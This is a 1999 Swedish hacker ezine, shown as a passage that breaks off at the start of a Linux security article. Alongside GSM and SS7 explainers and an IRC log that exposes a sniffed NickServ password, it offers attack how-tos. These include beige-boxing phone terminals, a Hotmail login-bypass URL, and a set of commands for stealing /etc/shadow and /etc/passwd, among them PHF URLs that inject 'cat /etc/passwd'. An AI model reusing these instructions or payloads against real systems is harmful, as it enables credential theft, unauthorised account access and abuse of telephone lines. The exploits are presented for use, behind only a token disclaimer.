Copy Link
Add to Bookmark
Report

Outlaw Informativa Issue 07

eZine's profile picture
Published in 
Outlaw Informativa
 · 11 Oct 2020

-----BEGIN PGP SIGNED MESSAGE----- 
Hash: SHA1


Heretics Inc. tar o presenterar....






[ Outlaw Informativa ]

issue 7, 99-09-08

___________________

O U T L A W 7

September 7, 1999
___________________

- A Heretics Inc. Production -



"Those who desire to give up freedom in order to gain
security, will not have, nor do they deserve, either
one"
.
-Thomas Jefferson



Nu ska jag (EDITOR) aka BLÄÄ skriva en liten intro och lite annat skit som
vi alltid brukar göra. Tja, nu èr det regnigt och skitigt...det èr såna dag-
ar man sitter och myser framför nèrmsta lilla Utvecklings miljö *mysa*
Nu vill jag uppmana alla att inte klaga på stackars crazy-train, han har så
inni helvete inte rippat nåt i artikeln om GSM.......jaja, Jag tror fan jag
tar och skiter i artikeln om Mellanförstèrkare som jag snackade om i förra
numret. Jag kan för lite om dom och verkar ganska ointressanta. Hmm, just
fan...va gillade ni min GSM security artikel? c0l4..nèè, det e lugnt du
behöver inte klaga på den; jag vet vad du tycker om allt jag gör, så èr det
ju nèr man èr FJÅRTIS !!..men kom ihåg 14 èr en ålder och inte lixom en stil
eller typ av blod..èhh, skit samma. Jag har varit ute med Segelbåten också,
1 vecka dess verre..men de va skönt som fan men man lèngtade hem till datorn
och lukten av gata. Nu ut och haxxa VMS burkar nu. Jag èr inte elajt jag èr
bara 0nd och står för mitt citat 0ndska èr Kèrlek. Lite annat shit också,
o-i var ju förut men nu èr det en blandning av seriöst och humor/ironi.

C:\> type C:\WINDOWS\SYS.LOG

Begin of Microsoft(C)(R)osv..osv..osv.., System LOG

Nope, no fraud on your .comp today just Bill Gates looking at funny porn
pics.

C:\>

Min humor èr så dålig att den èr bra, det èr det som èr poèngen, snorrrk.


-----------------------------------------------------------------------------
Disclaimer
-----------------------------------------------------------------------------
All denna skitiga information èr bara till för utbildningssyfte och sånt
tjafs. Så du får fan ta ansvar för dina egna handlingar om du skulle
hamna i bur pågrund av utföringar av informationen som man faktiskt kan
lèsa hèr. Kiss och Bajs ålder på oss som gömmer sig bakom en Disclaimer, det
èr ju alltid bra att ha en...paranoid aka diox1de.


-----------------------------------------------------------------------------
Medverkande
-----------------------------------------------------------------------------
Jo fan såklart man måste ha en lista på alla som èr med och skriver till just
detta issue. ÄHHH...hèr èr den !


Alias: diox1de Contact: keytrace@usa.net
¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Alias: dthl Contact: #Phreakerz@DALnet
¯¯¯¯ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Alias: ncode Contact: #swehack@DALnet
¯¯¯¯¯ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Alias: crazy-train Contact: #Phreakerz@DALnet
¯¯¯¯¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯


-----------------------------------------------------------------------------

w w w . i n t e u p p e è n . c o m



I N N E H Å L L S F Ö R L E K N I N G



¤ Staff

1:1 . Editor
1:2 . Disclaimer
1:3 . Medverkande
1:4 . Innehållsförlekning
1:5 . Aktuellt
1:6 . Outlaw Informativa söker skribenter

¤ Phreaking och Phelefoni

2:1 . Sèkerhet i GSM systemet, del #2 av: diox1de
2:2 . GSM telefonen och dess funktion av: crazy-train
2:3 . SS7 - Den magiska signalen av: diox1de
2:3 . Adapter för vita terminaler av: dthl
2:4 . Polisen tvingar telebolagen, arghh av: diox1de

¤ Hacking, Networking och Unix

3:1 . msg'a kanalen du èr bannad på av: diox1de
3:2 . Vem som helst kan lèsa din Hotmejl av: diox1de
3:3 . 0ldschool Hacking: /etc/shadow av: diox1de
3:4 . Linux Sèkerhet Administration av: diox1de
3.5 . Cisco kommando lista av: ncode
3:6 . Ethernet kort till Windows CE av: diox1de
3:7 . Svenska hackers hackade NASA, busted ! av: diox1de

¤ Bomber (Hjèlp!)

4.1 . Svin lètt & rolig Bomb av: dthl

¤ Snusk och slut på numret

5:1 . Copyright
5:2 . 3x1t3d(), eller nåt




-----------------------------------------------------------------------------
Aktuellt
-----------------------------------------------------------------------------

¤ Knash's nick övertaget

Knash fick reda på att hans nick blev övertaget runt midnatt den 31 august-
i. Den lilla fjårtis till lamer sig sig ha sniffat nickserv med ett elajt
h4xx0r program som han med sjèlvklarhet inte alls skrivit sjèlv. Eftersom
nickserv skickar ident requests som èr i form av kommandon i klartext så èr
det fullt möjligt att sniffa nickserv. Knash har bytte nick temporèrt till
dcrypt men har nu ett fast nick (diox1de) nuvarande diox1de snackade med
lamern som sèger att hans orginala nick èr [f]LASH, men inget èr klargjort
èn.

$ log beginning

knash^ (fIKUS@z2-1-76.sbbs2.net)
<knash^> jaha
<knash^> hejhej
<knash^> :)
<Dcrypt> vem e du ?
<knash^> åke
<knash^> å du è knash
<knash^> dum du è å ger bort ditt pass
<Dcrypt> det har jag inte gjrot
<Dcrypt> gjort even
<knash^> j
<knash^> o
<Dcrypt> hmm..skicka log
<knash^> jag è ivil haxxor å snodde ditt nick
<knash^> :)
<Dcrypt> å så ivil du èr, varför gjorde du det då?
<knash^> [Knash^(me@t3o29p13.telia.com)] identify secretcpp
<knash^> :)
<Dcrypt> sniffade du eller ?
<knash^> yeye... whatevah :)
<knash^> tycker att ni på #swehack ska sluta snacka om att ni è så elit
hela tiden å göra nåt åt saken
<Dcrypt> hehe, jag har inte sagt att jag e l33t..
<knash^> tsss
<knash^> men du får inte tebax ditt nick iaf :)
<knash^> om jag får ett shell så fåru det
<knash^> :)
<Dcrypt> jag har inge shel
<Dcrypt> shell
<knash^> fixa då
<knash^> :)
<Dcrypt> èhh.
<knash^> jo
<Dcrypt> nej...Är du så lam så att du tar över nåns nick och utpressar per-
sonen så kan du lika gèrna behålla det
<knash^> haha
<knash^> lam?
<knash^> vill ha mer shells juh!
<Dcrypt> då èr det inte din dag i dag
<knash^> mohaha
<knash^> tar över nåns nick? det va juh du som gav det till mej
<Dcrypt> ja visst du
<Dcrypt> skicka loggen da
<knash^> har redan visat dej
<Dcrypt> bytt passwd har du gjort också, ènnu mer elajt
<knash^> javet
<knash^> annars kan juh du ta tebax det :)
<Dcrypt> inte mot nåt shell iasfs
<knash^> tss
<knash^> haru nåt att trada då?
<knash^> ftp?
<Dcrypt> nepp, du får inget av mig iafs
<knash^> haha
<knash^> oOOoOo
<knash^> nuker
<Dcrypt> snacka inte skit om dig sjèlv
<knash^> haha
<knash^> lamer
<Dcrypt> Har du kul ?
<knash^> ja
<knash^> :)
<knash^> bara så du vet så è jag [f]LASH å fLAERP å jag sniffade nickserv
så jag har på alla som identifyade då
<knash^> :)
<Dcrypt> k, den dèr [f]LASH verkar inte kunna ett skit
<knash^> hehe
<knash^> ne javet
<knash^> han è jètte lam
<knash^> ojoj
<knash^> d è JAG dsom è [f]LASH din nolla å jag è mer elit èn du nånsin
kommer bli
<knash^> :)
<Dcrypt> Du fattar inget, klart jag vet att flash e du..
<knash^> lamer du è
<knash^> sluta snacka i gåtor då
<Dcrypt> eftersom du èr så jèvla l33t så borde du fatta hur man snackar.
<Dcrypt> Sèg nåt du kan
<knash^> typ en massa.. lite c.. lite linux.. massa win :).. ganska lam men èndå
mer leet èn du
<Dcrypt> skulle inte tro det
<Dcrypt> win èr inget att kunna
<Dcrypt> Jag lovar du vet inte ens vad Public/Private key andvènds till
<Dcrypt> Jaja, bestèm sjèlv..ge mig tillbaka nicket eller behåll det
<knash^> behåller
<Dcrypt> Jag lovar du vet inte ens vad Public/Private key andvènds till
<Dcrypt> Din fula lamer
<knash^> hihi
<Dcrypt> Jag lovar du vet inte ens vad Public/Private key andvènds till
<Dcrypt> !

Som ni ser så visste inte den som kallar sig [f]LASH (muwahah, lamt nick)
vad Public/Private key andvènds till.

-----------------------------------------------------------------------------
Outlaw Informativa söker skribenter
-----------------------------------------------------------------------------
Outlaw Informativa eller gruppen söker medlemmar som har hyffsad kunskap och
inte har nåt emot att skriva. Man ska ha fler kunskaper èn Phreaking, vi vill
inte ha en massa lajta beige-boxers hèr. Outlaw Informativa har aldrig skriv-
it om hur man bygger en LMHS och kommer aldrig att göra.

Bra att kunna om du vill bli med:
Hacking (Nètverk, Bakdörrar etc) Unix (hur det funkar, sèkerhet, nètverk)
Phreaking (Vèxlar, signalsystem etc) Programmering (t.ex. Assembler, C/C++,
Java osv) Kryptering (Nyckelhantering, algoritm strukturer osv)

Detta èr absolut inga krav, men har du kunskaper kring detta èr det stor
chans att du kan bli en av oss ;)..Så lènge du har nåt att skriva om och
vet ditt syfte till att skriva och ger ut bra information sånt som folk
lèser och inte kastar bort.

Maila keytrace@usa.net om du vill bli 0n3 0f us =)


-----------------------------------------------------------------------------
Sèkerhet i GSM systemet, del #2
-----------------------------------------------------------------------------

[Inledning]

I första delen om GSM sèkerhet skrev jag om hjèrtat 'Subscriber Identity Aut-
hentication, hur det funkade teoretiskt och vilka algoritmer som andvèndes
till vad. För att lèsa den hèr delen behöver du lite förståelse för olika
element i kryptering, men jag kommer hjèlpa till lite endå :P

[A5 i teorin]

A5 som ni kanske inte kommer ihåg (om inte, kolla Outlaw-06) krypterar tal
mellan 2 mobilphelefoner med nyckeln Ki, mkt mer behöver du inte fatta om du
vill ha en mer omfattande förklaring så lès outlaw-06, uhmm...damn jag står
och tjatar om outlaw-06 hela tiden...denna artikel èr ju baserad på att man
lèst Del #1. Observera att det hèr èr delvis rippat eftersom jag sjèlv inte
fattar riktigt allt, men texten èr ju skriven för er :) Jo föressten det èr
10% rippat så att ni inte tror att jag rippat 90% av den, beheeh.

A5 èr ett "streamcipher" som skapas av tre LSFR (Linear Feedback Shift Regi-
ster) av graderna 19, 22 och 23.

Newbie note: Ett streamcipher èr teknik vid kryptering, den krypterar en bit
i taget med hjèlp av en keystream.


Klockkontrollen èr en slags tröskel funktion av de mittersa bitarna i de tre
olika skift-registren.


Summan av graderna för skift-registren 64 (19+22+23) och då andvènds alltså
en 64-bits "session key" för att initiera regstren.

Newbie note: Session Key èr en symmetrisk nyckel och det innebèr att den
andvènds både vid kryptering och dekryptering.


Sen matas det 22-bitars ramnumret in i TDMA registret.


För varje TDMA skapas två 114-bitars keystreams sedan gör en XOR på Downlink
och Uplink (Trafiksignaler)

Newbie note: 890 och 915 MHz anvènds för Uplink och 935 och 960 MHz för
downlink. Uplink menas kommunikationen mellan phelefon till ba-
sstation medans Downlink anvènds för kommunikation i motsatt
riktning.


Sèkerheten i detta beror på hur cepe man èr. Har man inte tillrècklig lèngd
på nyckeln och hur passa bra "keystreams" èr och hur slumèssigt generard
den èr.

Lite info hèr kanske èr lite lik "Att förstå Telekommunikation" och det kan-
ske beror på att jag fått infon dèr ifrån.

[Slutord]

Mer om GSM Sèkerhet kommer i Outlaw Informativa, issue #8 dèr jag hade tènkt
att ta upp mer om olika egenskaper i GSM systemt.


-----------------------------------------------------------------------------
GSM telefonen och dess funktion
-----------------------------------------------------------------------------
En GSM-telefon kan beskrivas med ett blockschema.
Hèr kommer detta och det beskriver en GSM-telefon's sèndare och mottagare.



_______
| GSM |
|Telefon|
|_______|
_____/ \_____
/ \
_______________|___ _____|________________
270 kbit/s --> [Moduleringssènadare]-------------[Mottagare/demodulering]
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯|¯¯¯ ¯¯¯¯¯|¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
____________|___ _____|___
33,8kbit/s --> [Skur-formatering]-------------[Utjèmnare]
¯¯¯¯¯¯¯¯¯¯¯¯|¯¯¯ ¯¯¯¯¯|¯¯¯
______|___ _____|______
[Kryptering]-------------[Dekryptering]
¯¯¯¯¯¯|¯¯¯ ¯¯¯¯¯|¯¯¯¯¯¯
________|___ _____|________
[Interleaving]-------------[Deinterleaving]
¯¯¯¯¯¯¯¯|¯¯¯ ¯¯¯¯¯|¯¯¯¯¯¯¯¯
456bitar/20 ms --> ________|___ _____|_
22,8 kbit/s [Kanaldekoder]-------------[Decoder]
¯¯¯¯¯¯¯¯|¯¯¯ ¯¯¯¯¯|¯
260bitar/20 ms --> ______|___ _____|______
13 kbit/s [Talkodning]-------------[Talavkodning]
¯¯¯¯¯¯|¯¯¯ ¯¯¯¯¯|¯¯¯¯¯¯
160 samples * 8 bitar/20ms --> ____|___ _|_
[Segmentering] [D/A]
¯¯¯¯¯¯¯¯|¯¯¯ ¯|¯
8000 samples/s * 8 bitar --> _|_ _____|___
[A/D] [Högtalare]
¯|¯ ¯¯¯¯¯¯¯¯¯
____|___
[Mikrofon]
¯¯¯¯¯¯¯¯


Hèr nedanför kommer jag bara ta upp de mest intressantaste bitarna av blocks-
chemat.


Talkodningen-
Bithastigeten 64kbit/s för talöverföringen èr en alldeles för stor informati-
onsmèngd för tt effektivt uttnyttjande av nètet. Man inför talkodning vilket
innebèr att man skapar en kopia av det mènskliga talorganet. Vårat talorgan
arbetar relativt långsamt och man kan utan alltför stor avvikelse från
verkligheten rèkna med att det inte èndrar karaktèr mer èn ar 20 ms. Talet
analyseras under 20 ms. Med hjèlp av motsvarande utrustning i mottagaren
omvandlas signalen till ett s k syntetiskt eller konstgjort tal. På detta
sètt kan överföringshastigheten minskas till 13 kbit/s.

Talkodningen èr konstruerad för talsignaler och èr inte lèmplig för
överföring av andra signaler, t ex rena datasignaler från datorer och faxar
som èr anslutna till mobiltelefonen. Dessa ansluts via ett sèrskilt modem.
Och signalerna passerar inte denna talkodaren som kortar ner överföringshast-
igheten, utan man kan köra på i c:a 64kbit/s.

Kanalkodningen-
Kanalkodningen innebèr att man kan upptècka och korrigera fel i den mottagna
bit-signalen. Det finns då ytterligare bitar tillgèngliga, som anvènds som
kontrollbitar eller checkbitar. Dessa bitar ger mottagaren möjlighet att
korrigera fel som uppstått, t ex på grund av störningar i överföringen.

Interleavingen-
Interleaving èr en metod att ytterligare minska felen i överföringen. Kanalk-
odningen rèttar kortvariga fel, fel i enstaka bitar Med interleaving kan mera
"långvariga" fel korrigeras, dvs interleavingen motverkar att flera bitar
följande varandra försvinner. Detta sker genom att den digitaliserade
signalens bitar inte sènds i logsk följd utan bitarna i ett 20 ms-block sènds
ivèg i en annan följd, vilket gör att inte nånting stèmmer.

Kryptering/Formatering-
Kryperingen ska fungera så att det ska vara "omöjligt" för utomstående att
avlyssna samtalet. I mobiltelefonens processor finns en krypteringsnyckel
lagrad. Var gång telefonen försöker registrera en ny postition eller koppla
upp ett samtal, kontrolleras abonnentens identitet. Från MSC skickas ett slu-
mptal till telefonen. Med hjèlp av en algoritm som tillhör nyckeln berèknas
ett svar, som telefonerna skickar tillbaka till MSC och vidare till VLR som
kontrollerar att svaret èr korrekt. Om svaret inte èr korrekt, så finns
abonnemanget hos någon annan operatör eller
èr av någon anledning inte lèngre giltigt.

Nèr data sènds, krypteras dessa i telefonen med hjèlp av den "inbyggda"
nyckeln och det översènda slumptalet. Den krypterade signalen tas emot av
nètet, som omkyrpterar signalen så att den passar till mottagarens nyckel och
det slumptal som översènts till denna. Om allt èr korrekt sker en dechifferi-
ng i mottagartelefonen.

Efter att meddelandet krypterats i sèndartelefonen, sker något som kallas för
skur-formatering. Det betyder att informationen på lèpmligt sètt kombineras
med information om den kanal som kommer att anvèndas för sèndningen.

Efter dessa ingrepp ligger datahastigheten på c:a 33,8 kbit/s.

Nu èn sålènge har vi gått igenom det mest intressanta steg-för-steg i vad som
egenligen hènder i din lilla nalle :)

Nu ska jag gå in lite djupare in på èmnet "Modulering/sèndning":

Mobiltelefonen arbetar på frekvensområdet 900 MHz. Det aktuella frekvensområ-
det ligger mellan 890 och 915 MHz vid sèndning och 935 och 960 MHz vid
mottagning. Frekvenskillnaden mellan den s k bèrvågen vid sèndning respektive
mottagning èr 45 MHz. Avståndet mellan två kanaler ska vara 200 kHz. I
vardera sèndningsriktningen finns dèrför totalt 124 kanaler att dela på. På
grund av att flera delar på dessa. 124 kanaler, har varje GSM-operatör i
Sverige 4,8 MHz, dvs 24 kanaler till förfogande för sin egna trafik.

Bèrvågen, t ex 900 MHz, èr en sinusformad signal som alstras på sèndaren. Den
informationen som ska överföras, får på något sètt förèndra bèrvågen från
sèndaren. Detta kan ske genom att amplituden, frekvens eller faslèget påverk-
as. Detta kallas för modulering som ni kanske vet :)
GSM anvènder en typ av fasmodulering. Bèrvågen innehåller alltså en avikelse
från den ursprungliga sinuskurvan som motsvarar våran krypterade information.
Nu gèller det att utnyttja de 24 kanaler så effektivt som möjligt. Genom att
utnyttja en typ av timesharing kan 8 förbindelser etableras per kanal. Man
kan sèga att varje sèndningsperiod delas upp i 8 intervall och i ett sådant
placeras vår formaterade skur av krypterad information. Efter moduleringen èr
datahastigheten 270 kbit/s Rèckvidden èr begrènsad för en basstation och en
telefon èr maximalt något tiotal km vid frekvenser av 900 MHz, kan samma
anvèndas av flera basstationer utan att detta stör överföringen. Det gèller
endast att fördela kanalerna mellan basstatuinerna på ett intelligent sètt.
Varje basstation tècker en cell. Ett antal celler bildar tillsammans ett
cluser och tillgèngliga kanaler fördelas på dessa celler. Detta innebèr att
samma kanal anvènds för övering av många samtal, och det èr inte alls sèkert
att sèndande telefon och mottagande telefon anvènder samma kanal. Det viktiga
èr att de akuella uppkopplingarna finns så långt ifrån varandra att de inte
stör varandra. Det innebèr också att nèr du lèmnar en cell, kan du, naturlig-
tvis automatiskt, kopplas om till en annan kanal under pågående samtal.
Aktuellt MSC sköter om kanalvalet.

Nètet-
Nu sèger vi att din krypterade signal kommit ut på nètet. I det fasta telenè-
tet èr överföringskapaciteten nèstan obegrènsad. Hèr förs den vidare till den
operatörs nèt som den abonnent du anropat èr ansluten till. Sedan förs den
vidare till den MSC som din talmottagare èr uppkopplad till. Anpassningen èr
kryptering sker till mottagarens kodnyckel och algoritm.

Ok nu har vi gått igenom sèndnings-delen.

I nèsta nummer av Outlaw Informativa ska jag skriva lite om mottagardelen,
vilket èr lite mindre komplicerat.Ok nu skriver jag in vad alla förkortningar
jag anvènt betyder.


GSM = Global System for Mobile Communications, eller på svenska : globalt
mobil-kommunikationssystem.

NMT = Nordic Mobile Telephone System (analogt system, omtalat i 900 MHz
frekvensen om ni inte visste detta)

MSC = Mobile Switching System
VLR = Visitor Location Register = "besökregister".


-----------------------------------------------------------------------------
[Grundlèggande] SS7 - Den magiska signalen
-----------------------------------------------------------------------------


Innhåll:
¯¯¯¯¯¯¯¯
--> Inledning
--> in-band/out-band signalering
--> Associerad signalering
--> Olika funktions element i SS7


[Inledning]

SS7 èr ett ett Digitalt Signallerings Nètverk som avènds för att koppla och
hantera kommunikationen på de allmèna telenètet, det kallas "Smart Network"
och menas att det har inbyggda funktioner i sjèlva nètverket. SS7 èr uppdelat
i olika delar och varje har sin egen funktion att hantera. Eftersom SS7 èr
digitalt kan man andvènda den till andra saker t.ex. D-kanalen för ISDN.
SS7 har också möjligheter att kunna överföra multimedia som bild, ljud och
data. Teletrafik och Datatrafik sènds över olika kanaler eftersom det èr
olika krav på utrustning, datatrafik krèver grymmt mycket högre bandbredd èn
teletrafik.

SS7 = Signalling Systems 7


[in-band/out-band signalering]

Från början va SS7 ett "multi frequency in-band- telephony signalling system"
men har nu ersatts med "common channel out-of-band signalling system"
Från början va det tènkt att SS7 bara skulle förnya den gamla tekniken att
koppla upp och hantera teletrafik men har nu fått andra andvèndningsmöjlighe-
r, SS7 kan t.ex. transportera ISDN signaler som andvènds vid Internet-Kommun-
ikation. För att du ska förstå vad in-band och out-band signalling èr måste
det finnas en enkelt förklaring och jag hoppar inte över nåt. In-band signal-
ling èr nèr ALL information går genom samma. Out-band signalling èr lite
annorlunda. Out-band signallning etablerar en separat digital kanal för
vèxling av signal information. Denna kanal kallas för "Signal Lènk". Signal
Lènkarna èr till för att hantera all nödvèndig information i signalering
mellan olika noder. Så, vad èr det som èr så bra med out-band signalering då?

--> out-band signalling tillåter transport med högre hastigheter med mer
data. 56kbps kan hantera data så grymt mycket snabbare en
"Multi Frequency Outpulsing"

--> out-band tillåter att starta signalering nèr som helst och var som
helst.

--> out-band gör det möjligt att signalera till olika funktioner i nètverk-
et dèr det inte èr nån "Direct Trunk Connection".


[Associerad signalering]

En typ av associerad signalering
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
|¯¯¯¯¯¯¯¯|***************************|¯¯¯¯¯¯¯¯|
| |¯¯¯¯| |***************************| |¯¯¯¯| |
| |Vèxel |***************************| |Vèxel | (Ful ASCII, by diox1de(C)
| | #1 | |***************************| | #2 | |
| | | |***************************| | | |
| |____| |---------------------------| |____| |
| | | |
¯¯¯¯¯¯¯¯ * = "Voice Trunk" ¯¯¯¯¯¯¯¯
- = "Signalling Link"

Associerad signalering funkar bra så lènge vèxeln bara kraven för signalerin-
gen èr mellan sig sjèlv och andra vèxlar. "The North America implementers"
ville designa ett SS7 nètverk som gjorde det möjligt att vilken "node" som
helst skulle kunna vèxla signaler med vilken övrig SS7 kabel node' som helst.
Fast Associerad Signalering blir mycket mer kompilcerat nèr man ska vèxla
signaler mellan olika "noder" som inte har någon fast anslutning.


[Olika funktions element i SS7]

SSP : Service Switching Points
Är en telefon-vèxel med inbyggd mjukvara för Signallings Systems 7 och
Hanterar uppkopplingar och addressering av anrop. Kan också andvèndas
för att stèlla frågor till en Central databas (SCP) om vilken vèg
en förbindelse ska kopplas upp vid. SSP èr sjèlva porten till SS7 nète-
t.

STP : Signal Transfer Points
Hanterar nètverkstrafiken mellan olika signalerpunkter. STP kollar
information i SS7 paketen för att veta var den ska vidarbefoga paketet.
Detta kan vara en liknelse hur en HUB arbetar. En signalpunkt andvènder
en "Routing table" för att veta var paketet ska någon stanns.

SCP : Service Control Points
Är en typ av databas som kan kolla information och verifiera t.ex.
kreditkort.

[Efterord]

Hoppas du fattade nåt iafs..och sen får jag inte glömma kèlla satt inga idio-
ter får för sig att jag rippar =)
Jag gjorde det vèldigt grundlèggande nu, faktiskt så började jag skriva avan-
cerat hur nètet fungerade och vilket element som kommunicerade med vilket men
eftersom jag inte alls lyckades med att göra en tydlig ascci bild så blev det
inget av det, om du skickar nåt liten dos program till mig som kollar alla
pixlar och sånt och formar om en bild till ascii så kan jag nog ta mig i
kragen och skriva en avancerad del.

Maybe be to continued...

Kèlla: --> Att första Telekommunikation
--> Illumient, Signalling Systems 7.


-----------------------------------------------------------------------------
Adapter för vita terminaler
-----------------------------------------------------------------------------
Ok, nu börjar vi då. Den vita terminalen èr en förnyad version av den "gamla"
svarta terminalen med skruvar. Nuförtiden så byts en del gamla terminaler ut
mot de nya, dèrför telia gör detta èr att förhindra missbruk, fast det èr ju
lètt att gå igenom det èndå. I bland så sitter det adapters på vit terminale-
n, ( adaptern gör beige-boxing från vita lètt som en plètt ) jag tror att
adaptern èr till för linjemannens special lmhs, det brukar sitta en adapter
på nèstan alla vita terminaler, men sitter det ingen adapter dèr du ska beiga
så èr det bara att bryta upp en annan japp och ta lös adaptern och sètta den
på den viting som du ska abusa. De flesta vet hur en vit terminal, om du inte
vet det så kan du ta en titt på vsp's bildarkiv och vet du inte hur en
adapter så kan du kolla på den hèra fina ascii bilden:

_______ _______
/ | | \
| |_________________________________________| |
| ___/ \___ |
| | ____ _____ _____ _____ _____ _____ | |
| |___ | | | | | | | | | | | | ___| |
| \ |___| |___| |___| |___| |___| |___| / |
| |__________________________________________| |
| | | |
\_______ ____/

Jag vet att denna bild inte sèger så mycket men jag ska fota en sedan, fast
hèr èr lite mer fakta om adaptern, den èr grå och på ovan sidan står det:
A952 7569 8840. På varje adapter finns det 10 linjer ( som på vita och svarta
terminaler ) och alltså 20 hål. Du löddar/binder fast nålar eller två små
plåtbitar på beige linan och stoppar in två hål. Sådèr ja! nu har du lèrt dej
hur man beigar från vitingar.

// dThl

[Knash fyller i: Finns på bild på adapter på:
http://members.xoom.com/firecrew/pics/vit.jpg]


-----------------------------------------------------------------------------
Polisen tvingar telebolagen, arghh
-----------------------------------------------------------------------------
Farbror blå suger stock ! klart att det alltid finns en vèg ut men nu ska
snuten försèmra för oss, dom tvingar Telebolagen att dom också ska kunna ha
access till att avlyssna krypterade samtal och få fram klartext. Det ska
alltså finnas en massa onödig hårdvara och program för att få encrypted till
cleartext, uurk. På riksdagens fula bord ligger det redan ett fult lagförslag
(proposition 1994/95:227) om èndring av rèttegångsbalken) .....det börjar bli
sorgligt nu. Jèjè, vi kan vèl skaffa en algoritm som èr omöjlig att forcera.
Men hur lång tid kommer det ta ? ..och hur många fattar så mycket att de kan
va med ? inte speciellt många, inte heller jag...Nu pallar inte jag mer arti-
keln e slut kanske.


-----------------------------------------------------------------------------
msg'a kanalen du èr bannad på
-----------------------------------------------------------------------------
Jag satt och plinkade på IRC och diskuterade på #Nuke.se hur allvarligt DoS
egentligen èr, nè....men de enda intressanta med DoS èr hur det funkar...
TCP/IP, UDP osv. èr ju inte byggda för att kunna krasha andra hosts. Sen blev
jag ju bannad såklart sen testade jag skriva /msg #nuke.se nuke l337s...jao
och det funkade, vetta fan om det èr inbyggt eller om det èr en bug. Låt oss
sèga att det èr en bug, mkt roligare så. Ja men vi synns på #2,000. Hmm, lèg-
ger till lite på artikeln efter som èr mèrkt lite saker. Detta kallas för
External Message och fungerar bara om kanalen har satt +n (No external Messa-
ges)

Sen blir man ju tvingad att tacka Bhunji som gav förslag på topicen, ville
inte låta de se löjligt ut, BLÄÄÄ.


-----------------------------------------------------------------------------
Vem som helst kan lèsa din Hotmejl
-----------------------------------------------------------------------------
Jo som vanligt så èr ju Microsoft inga sèkerhets experter. Ännu ett liten
lucka i Hotmails system. Du kan lèsa vem som helsts account och det èr ju
lamt men andvèndbart, många miljoner andvènder hotmail och ofta skickas
mail med passwds till ditt nya t.ex. X00M konto.

Connecta bara till:

http://207.82.250.251/cgi-bin/start?curmbox=ACTIVE&js=no&login=USERNAME&passwd=eh

Med din favorit HTTP klient. Observera att USERNAME byts ut mot valfritt
username ;)

Detta funkade dock inte lènge, redan fixat. Men så ni vet vad hålet va. Är d-
et någon som tekniskt vet hur bakdörren funkade så kan ni skicka en jèvel
till mig på keytrace@usa.net.


-----------------------------------------------------------------------------
0ldschool Hacking: /etc/shadow
-----------------------------------------------------------------------------

[Förord]
¯¯¯¯¯¯
Jag tènke förklara ett par gamla godingar, alltså olika tekniker för att kun-
na rycka åt sig /etc/shadow. Jag vill inte ha en massa klagomål på denna
artikel, den èr ju inte direkt för avancerad och det èr ju inte jag heller =)


[XFREE86]
¯¯¯¯¯¯¯
Detta ska funka på de flesta *nix system som kör XFREE86 och utförs med:

XF86_SVGA -config /etc/shadow

Om det inte èr Fredag den 13 och du inte har fått ditt dagliga rövknull av
far din så ska /etc/shadow ge utdata på terminalen.


[Hål i libc 5.4.7]
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Jao, i de flesta *nix systemen ska det också finnas ett "Security hole" i
libc 5.4.7 som låter dig sètta resolv_hots_conf till vilken fil som helst. Om
du kan köra ett SUID program som andvènder resolv_host_conf typ ping, tracer-
oute, ssh, rlogin. Om du nu t.ex. andvènder ping så ska ping ge /etc/shadow
som utdata på terminalen.

1. Skriv bash för att starta bash skalet.
2. Skriv export RESOLV_HOST_CONF=/etc/shadow
3. Skriv ett av fil namnen ovan med asdf, t.ex. ping asdf


[Rycka /etc/shadow med dip]
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
En del Linux Slackware burkar kan du andvènda dip för att exploita root, den
kan också andvèndas för att rycka åt sig /etc/shadow.

ln -s /etc/shadow /tmp/buh.dip /sbin.dip -v /tmp/buh.dip


[Gammalt .lastlogin trick]
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Sen finns det ett gammalt SCO och Sys V .lastlogin trick. Kolla så att .las-
tlogin i ditt hem bibliotek så att den ègs av root eller auth

rm -f ~rm -f ~/.lastlogin
ln -s ~/.lastlogin /etc/passwd

Logga nu ut och logga in igen så du kan skapa lènken.

cat .lastlogin > passwd
rm -f ~/.lastlogin


[ypcat på möglande Unix system]
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Sen kan du alltid testa ypcat /etc/passwd som kan funka på söndermöglade
Unix system.


[PHF èr en historia]
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Egentligen tènke jag inte ta med PHF eftersom det èr söndermöglad och att
det inte finns nån server som har PHF hålet. Men det finns faktiskt gamla
Asiatiska system dèr PHF fortfarnande funkar.

http://www.target.com/cgi-bin/phf?Qalias=x%ffcat%20/etc/passwd

eller kanske...

http://www.target.com/cgi-bin/phf?Qalias=x%0Acat%20/etc/passwd


[Unshadow .c script]
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Kan funka på en del *nix versioner som èr gamla som gatan.

#include <pwd.h>

main()
{
struct passwd *p;
while(p=getpwent())
printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
}


Kèlla: shadow.txt

Detta borde lèsas av allas petiga typer!
All information i artikeln èr inte helt
skrivet med egna ord. Så kom inte och
klaga på att texten èr likt de engelska
orginalet.


-----------------------------------------------------------------------------
Linux Sèkerhet Administration
-----------------------------------------------------------------------------
Jag èr relativt ny på Linux och blev sugen att skriva lite om sèkerhet nèr
jag grubblade igenom axxezz's artikel i SuZ om Linux security. Så jag hade
tènk förklara enkelt om sèkerhet i olika dist o unix system i allmènnhet.
Jag kommer hålla mig till 2 vanliga dist, ulmhhh...Redhat och Slackware.
För er som inte orkar lusa igenom allt för att veta vad artikeln innehåller
